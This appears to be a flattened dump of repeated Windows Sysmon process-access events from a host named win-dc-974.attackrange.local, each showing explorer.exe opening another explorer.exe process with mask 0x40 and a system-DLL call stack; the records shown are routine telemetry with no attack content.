16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.675{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.674{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.674{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.674{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.674{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.674{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.674{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 